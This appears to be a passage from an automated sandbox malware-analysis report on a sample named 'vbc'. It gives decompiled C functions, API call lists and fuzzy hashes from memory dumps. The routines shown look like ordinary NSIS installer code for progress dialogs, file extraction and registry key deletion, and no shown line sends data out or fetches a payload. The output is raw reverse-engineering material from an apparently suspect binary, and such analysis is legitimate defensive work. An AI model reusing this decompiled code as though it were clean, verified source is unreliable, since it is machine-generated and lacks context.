          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: MessageSendlstrlen$lstrcat$TextWindow
          • String ID:
          • API String ID: 1495540970-0
          • Opcode ID: 5359f18cea5025c05ea2e312da5c850c9979a77eaabc6fad8f28e044c716b6a3
          • Instruction ID: b1df74b24ef97eccf04675f52fbaffa54a328febca5869b92639b2b84e823bb6
          • Opcode Fuzzy Hash: 5359f18cea5025c05ea2e312da5c850c9979a77eaabc6fad8f28e044c716b6a3
          • Instruction Fuzzy Hash: 32219D71900518FACF119FA5DD84ACFBFB8EF85350F10842AF904B6290C7794A40DFA8
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 91%
          			E004068F5(WCHAR* _a4) {
          				short _t5;
          				short _t7;
          				WCHAR* _t19;
          				WCHAR* _t20;
          				WCHAR* _t21;
          
          				_t20 = _a4;
          				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
          					_t20 =  &(_t20[4]);
          				}
          				if( *_t20 != 0 && E00405FB4(_t20) != 0) {
          					_t20 =  &(_t20[2]);
          				}
          				_t5 =  *_t20;
          				_t21 = _t20;
          				_t19 = _t20;
          				if(_t5 != 0) {
          					do {
          						if(_t5 > 0x1f &&  *((short*)(E00405F6A(L"*?|<>/\":", _t5))) == 0) {
          							E00406119(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
          							_t19 = CharNextW(_t19);
          						}
          						_t20 = CharNextW(_t20);
          						_t5 =  *_t20;
          					} while (_t5 != 0);
          				}
          				 *_t19 =  *_t19 & 0x00000000;
          				while(1) {
          					_push(_t19);
          					_push(_t21);
          					_t19 = CharPrevW();
          					_t7 =  *_t19;
          					if(_t7 != 0x20 && _t7 != 0x5c) {
          						break;
          					}
          					 *_t19 =  *_t19 & 0x00000000;
          					if(_t21 < _t19) {
          						continue;
          					}
          					break;
          				}
          				return _t7;
          			}








          0x004068f7
          0x00406900
          0x00406917
          0x00406917
          0x0040691e
          0x0040692a
          0x0040692a
          0x0040692d
          0x00406930
          0x00406935
          0x00406937
          0x00406940
          0x00406944
          0x00406961
          0x00406969
          0x00406969
          0x0040696e
          0x00406970
          0x00406973
          0x00406978
          0x00406979
          0x0040697d
          0x0040697d
          0x0040697e
          0x00406985
          0x00406987
          0x0040698e
          0x00000000
          0x00000000
          0x00406996
          0x0040699c
          0x00000000
          0x00000000
          0x00000000
          0x0040699c
          0x004069a1

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: Char$Next$Prev
          • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
          • API String ID: 589700163-3083651966
          • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
          • Instruction ID: be6858c8d4b602c62de40fdc636a35535680886f1e3ed17f643e47e9e10769a1
          • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
          • Instruction Fuzzy Hash: 0D11E6A580060295DB302B148C40A7762E8AF94750F12403FE98AB36C1E7BC4CA2C6BD
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E0040302E(intOrPtr _a4) {
          				short _v132;
          				long _t6;
          				struct HWND__* _t7;
          				struct HWND__* _t15;
          
          				if(_a4 != 0) {
          					_t15 =  *0x79f73c;
          					if(_t15 != 0) {
          						_t15 = DestroyWindow(_t15);
          					}
          					 *0x79f73c = 0;
          					return _t15;
          				}
          				if( *0x79f73c != 0) {
          					return E00406A77(0);
          				}
          				_t6 = GetTickCount();
          				if(_t6 >  *0x7a8aac) {
          					if( *0x7a8aa8 == 0) {
          						_t7 = CreateDialogParamW( *0x7a8aa0, 0x6f, 0, E00402F93, 0);
          						 *0x79f73c = _t7;
          						return ShowWindow(_t7, 5);
          					}
          					if(( *0x7a8b54 & 0x00000001) != 0) {
          						wsprintfW( &_v132, L"... %d%%", E00403012());
          						return E004056D0(0,  &_v132);
          					}
          				}
          				return _t6;
          			}







          0x0040303d
          0x0040303f
          0x00403046
          0x00403049
          0x00403049
          0x0040304f
          0x00000000
          0x0040304f
          0x0040305d
          0x00000000
          0x00403060
          0x00403067
          0x00403073
          0x0040307b
          0x004030b9
          0x004030c2
          0x00000000
          0x004030c7
          0x00403084
          0x00403095
          0x00000000
          0x004030a3
          0x00403084
          0x004030cf

          APIs
          • DestroyWindow.USER32 ref: 00403049
          • GetTickCount.KERNEL32(00000000), ref: 00403067
          • wsprintfW.USER32 ref: 00403095
            • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
            • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
            • Part of subcall function 004056D0: lstrcatW.KERNEL32 ref: 0040572B
            • Part of subcall function 004056D0: SetWindowTextW.USER32 ref: 0040573D
            • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
            • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
            • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
          • CreateDialogParamW.USER32 ref: 004030B9
          • ShowWindow.USER32(00000000,00000005), ref: 004030C7
            • Part of subcall function 00403012: MulDiv.KERNEL32 ref: 00403027
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
          • String ID: ... %d%%
          • API String ID: 722711167-2449383134
          • Opcode ID: 54489552992201bc3988819c72fa622d06d96af98b9c9b950ef7c711f1b17aa9
          • Instruction ID: 36a9105e1bf518e5a00a94211bbaadb265df24d4843d4ed97aac6270594080be
          • Opcode Fuzzy Hash: 54489552992201bc3988819c72fa622d06d96af98b9c9b950ef7c711f1b17aa9
          • Instruction Fuzzy Hash: 40015B70413610ABC7217FA0AD49A9A7FACAB01B06F50853BF441F25E9DA7C46458B9E
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E00404F85(struct HWND__* _a4, intOrPtr _a8) {
          				long _v8;
          				signed char _v12;
          				unsigned int _v16;
          				void* _v20;
          				intOrPtr _v24;
          				long _v56;
          				void* _v60;
          				long _t15;
          				unsigned int _t19;
          				signed int _t25;
          				struct HWND__* _t28;
          
          				_t28 = _a4;
          				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
          				if(_a8 == 0) {
          					L4:
          					_v56 = _t15;
          					_v60 = 4;
          					SendMessageW(_t28, 0x113e, 0,  &_v60);
          					return _v24;
          				}
          				_t19 = GetMessagePos();
          				_v16 = _t19 >> 0x10;
          				_v20 = _t19;
          				ScreenToClient(_t28,  &_v20);
          				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
          				if((_v12 & 0x00000066) != 0) {
          					_t15 = _v8;
          					goto L4;
          				}
          				return _t25 | 0xffffffff;
          			}














          0x00404f93
          0x00404fa0
          0x00404fa6
          0x00404fe4
          0x00404fe4
          0x00404ff3
          0x00404ffa
          0x00000000
          0x00404ffc
          0x00404fa8
          0x00404fb7
          0x00404fbf
          0x00404fc2
          0x00404fd4
          0x00404fda
          0x00404fe1
          0x00000000
          0x00404fe1
          0x00000000

          APIs
          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FA0
          • GetMessagePos.USER32 ref: 00404FA8
          • ScreenToClient.USER32(?,?), ref: 00404FC2
          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FD4
          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FFA
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: Message$Send$ClientScreen
          • String ID: f
          • API String ID: 41195575-1993550816
          • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
          • Instruction ID: 51d4338ac073bbeac8b2964ce5aa15998fcdd55d82c6f64f668885239b8ba4c4
          • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
          • Instruction Fuzzy Hash: D6015E7194021DBADB00DBA5DD85FFEBBBCAF54711F10012BBB50B61C0D7B49A058BA5
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
          				short _v132;
          				void* _t11;
          				WCHAR* _t19;
          
          				if(_a8 == 0x110) {
          					SetTimer(_a4, 1, 0xfa, 0);
          					_a8 = 0x113;
          				}
          				if(_a8 == 0x113) {
          					_t11 = E00403012();
          					_t19 = L"unpacking data: %d%%";
          					if( *0x7a8ab0 == 0) {
          						_t19 = L"verifying installer: %d%%";
          					}
          					wsprintfW( &_v132, _t19, _t11);
          					SetWindowTextW(_a4,  &_v132);
          					SetDlgItemTextW(_a4, 0x406,  &_v132);
          				}
          				return 0;
          			}






          0x00402fa3
          0x00402fb1
          0x00402fb7
          0x00402fb7
          0x00402fc5
          0x00402fc7
          0x00402fd3
          0x00402fd8
          0x00402fda
          0x00402fda
          0x00402fe5
          0x00402ff5
          0x00403007
          0x00403007
          0x0040300f

          APIs
          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
          • wsprintfW.USER32 ref: 00402FE5
          • SetWindowTextW.USER32 ref: 00402FF5
          • SetDlgItemTextW.USER32 ref: 00403007
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: Text$ItemTimerWindowwsprintf
          • String ID: unpacking data: %d%%$verifying installer: %d%%
          • API String ID: 1451636040-1158693248
          • Opcode ID: 863410c55cf87ff373a2389e5224159976098539ce34d2f9597aa36d95ce2bb5
          • Instruction ID: 8fb0b87627a2e5c232f470bc2292a7be8d93e7e9342cf65e243ccc0cc3a46c1c
          • Opcode Fuzzy Hash: 863410c55cf87ff373a2389e5224159976098539ce34d2f9597aa36d95ce2bb5
          • Instruction Fuzzy Hash: 74F0367050020DABEF246F50DD49BEA3B69EB40309F00C03AF606B51D0DBBD99549B59
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 93%
          			E00402950(void* __ebx) {
          				WCHAR* _t26;
          				void* _t29;
          				long _t37;
          				void* _t49;
          				void* _t52;
          				void* _t54;
          				void* _t56;
          				void* _t59;
          				void* _t60;
          				void* _t61;
          
          				_t49 = __ebx;
          				_t52 = 0xfffffd66;
          				_t26 = E00402DA6(0xfffffff0);
          				_t55 = _t26;
          				 *(_t61 - 0x40) = _t26;
          				if(E00405FB4(_t26) == 0) {
          					E00402DA6(0xffffffed);
          				}
          				E00406139(_t55);
          				_t29 = E0040615E(_t55, 0x40000000, 2);
          				 *(_t61 + 8) = _t29;
          				if(_t29 != 0xffffffff) {
          					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
          					if( *(_t61 - 0x28) != _t49) {
          						_t37 =  *0x7a8ab4;
          						 *(_t61 - 0x44) = _t37;
          						_t54 = GlobalAlloc(0x40, _t37);
          						if(_t54 != _t49) {
          							E004035FE(_t49);
          							E004035E8(_t54,  *(_t61 - 0x44));
          							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
          							 *(_t61 - 0x10) = _t59;
          							if(_t59 != _t49) {
          								E00403377(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
          								while( *_t59 != _t49) {
          									_t51 =  *_t59;
          									_t60 = _t59 + 8;
          									 *(_t61 - 0x3c) =  *_t59;
          									E00406119( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
          									_t59 = _t60 +  *(_t61 - 0x3c);
          								}
          								GlobalFree( *(_t61 - 0x10));
          							}
          							E00406210( *(_t61 + 8), _t54,  *(_t61 - 0x44));
          							GlobalFree(_t54);
          							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
          						}
          					}
          					_t52 = E00403377(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
          					CloseHandle( *(_t61 + 8));
          				}
          				_t56 = 0xfffffff3;
          				if(_t52 < _t49) {
          					_t56 = 0xffffffef;
          					DeleteFileW( *(_t61 - 0x40));
          					 *((intOrPtr*)(_t61 - 4)) = 1;
          				}
          				_push(_t56);
          				E00401423();
          				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t61 - 4));
          				return 0;
          			}













          0x00402950
          0x00402952
          0x00402957
          0x0040295c
          0x0040295f
          0x00402969
          0x0040296d
          0x0040296d
          0x00402973
          0x00402980
          0x00402988
          0x0040298b
          0x00402997
          0x0040299a
          0x004029a0
          0x004029ae
          0x004029b3
          0x004029b7
          0x004029ba
          0x004029c3
          0x004029cf
          0x004029d3
          0x004029d6
          0x004029e0
          0x004029ff
          0x004029e7
          0x004029ec
          0x004029f4
          0x004029f7
          0x004029fc
          0x004029fc
          0x00402a06
          0x00402a06
          0x00402a13
          0x00402a19
          0x00402a1f
          0x00402a1f
          0x004029b7
          0x00402a33
          0x00402a35
          0x00402a35
          0x00402a3f
          0x00402a40
          0x00402a44
          0x00402a48
          0x00402a4e
          0x00402a4e
          0x00402a55
          0x004022f1
          0x00402c2d
          0x00402c39

          APIs
          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
          • GlobalFree.KERNEL32(?), ref: 00402A06
          • GlobalFree.KERNEL32(00000000), ref: 00402A19
          • CloseHandle.KERNEL32(?), ref: 00402A35
          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: Global$AllocFree$CloseDeleteFileHandle
          • String ID:
          • API String ID: 2667972263-0
          • Opcode ID: 01061f3d3ca3a4d7c364cd067c19041a51f9a0b08810e1f4a161c9a0c4070a25
          • Instruction ID: ec4356a3eb6c7711b506d5a245a30aad41ccfdb787a60eec272099fea1c037c4
          • Opcode Fuzzy Hash: 01061f3d3ca3a4d7c364cd067c19041a51f9a0b08810e1f4a161c9a0c4070a25
          • Instruction Fuzzy Hash: D431C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E1CB798D419B98
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 48%
          			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
          				void* _v8;
          				int _v12;
          				short _v536;
          				void* _t27;
          				signed int _t33;
          				intOrPtr* _t35;
          				signed int _t45;
          				signed int _t46;
          				signed int _t47;
          
          				_t46 = _a12;
          				_t47 = _t46 & 0x00000300;
          				_t45 = _t46 & 0x00000001;
          				_t27 = E004064DB(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
          				if(_t27 == 0) {
          					if((_a12 & 0x00000002) == 0) {
          						L3:
          						_push(0x105);
          						_push( &_v536);
          						_push(0);
          						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
          							__eflags = _t45;
          							if(__eflags != 0) {
          								L10:
          								RegCloseKey(_v8);
          								return 0x3eb;
          							}
          							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
          							__eflags = _t33;
          							if(_t33 != 0) {
          								break;
          							}
          							_push(0x105);
          							_push( &_v536);
          							_push(_t45);
          						}
          						RegCloseKey(_v8);
          						_t35 = E00406A3B(3);
          						if(_t35 != 0) {
          							return  *_t35(_a4, _a8, _t47, 0);
          						}
          						return RegDeleteKeyW(_a4, _a8);
          					}
          					_v12 = 0;
          					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
          						goto L10;
          					}
          					goto L3;
          				}
          				return _t27;
          			}












          0x00402eb4
          0x00402ebd
          0x00402ec6
          0x00402ed2
          0x00402edb
          0x00402ee5
          0x00402f0a
          0x00402f10
          0x00402f15
          0x00402f16
          0x00402f46
          0x00402f1f
          0x00402f21
          0x00402f71
          0x00402f74
          0x00000000
          0x00402f7a
          0x00402f30
          0x00402f35
          0x00402f37
          0x00000000
          0x00000000
          0x00402f3f
          0x00402f44
          0x00402f45
          0x00402f45
          0x00402f52
          0x00402f5a
          0x00402f61
          0x00000000
          0x00402f8a
          0x00000000
          0x00402f69
          0x00402ef5
          0x00402f08
          0x00000000
          0x00000000
          0x00000000
          0x00402f08
          0x00402f90

          APIs
          • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00402EFD
          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
          • RegCloseKey.ADVAPI32(?), ref: 00402F52
          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
          • RegCloseKey.ADVAPI32(?), ref: 00402F74
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: CloseEnum$DeleteValue
          • String ID:
          • API String ID: 1354259210-0
          • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
          • Instruction ID: e84adf69fee3246f56ef13a6fd4e717e0861f51d99737fac189c4d1833cff19f
          • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
          • Instruction Fuzzy Hash: 31213B7150010ABBDF11AF90CE89EEF7B7DEB54384F110076F909B21E0D7B59E54AA68
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 77%
          			E00401D81(void* __ebx, void* __edx) {
          				struct HWND__* _t30;
          				WCHAR* _t38;
          				void* _t48;
          				void* _t53;
          				signed int _t55;
          				signed int _t60;
          				long _t63;
          				void* _t65;
          
          				_t53 = __ebx;
          				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
          					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
          				} else {
          					E00402D84(2);
          					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
          				}
          				_t55 =  *(_t65 - 0x24);
          				 *(_t65 + 8) = _t30;
          				_t60 = _t55 & 0x00000004;
          				 *(_t65 - 0x38) = _t55 & 0x00000003;
          				 *(_t65 - 0x18) = _t55 >> 0x1f;
          				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
          				if((_t55 & 0x00010000) == 0) {
          					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
          				} else {
          					_t38 = E00402DA6(0x11);
          				}
          				 *(_t65 - 0x44) = _t38;
          				GetClientRect( *(_t65 + 8), _t65 - 0x60);
          				asm("sbb esi, esi");
          				_t63 = LoadImageW( ~_t60 &  *0x7a8aa0,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
          				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
          				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
          					DeleteObject(_t48);
          				}
          				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
          					_push(_t63);
          					E004065B5();
          				}
          				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t65 - 4));
          				return 0;
          			}











          0x00401d81
          0x00401d85
          0x00401d9a
          0x00401d87
          0x00401d89
          0x00401d8f
          0x00401d8f
          0x00401da0
          0x00401da3
          0x00401dad
          0x00401db0
          0x00401db8
          0x00401dc9
          0x00401dcc
          0x00401dd7
          0x00401dce
          0x00401dd0
          0x00401dd0
          0x00401ddb
          0x00401de5
          0x00401e0c
          0x00401e1b
          0x00401e29
          0x00401e31
          0x00401e39
          0x00401e39
          0x00401e42
          0x00401e48
          0x00402ba4
          0x00402ba4
          0x00402c2d
          0x00402c39

          APIs
          • GetDlgItem.USER32(?,?), ref: 00401D9A
          • GetClientRect.USER32 ref: 00401DE5
          • LoadImageW.USER32 ref: 00401E15
          • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
          • DeleteObject.GDI32(00000000), ref: 00401E39
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
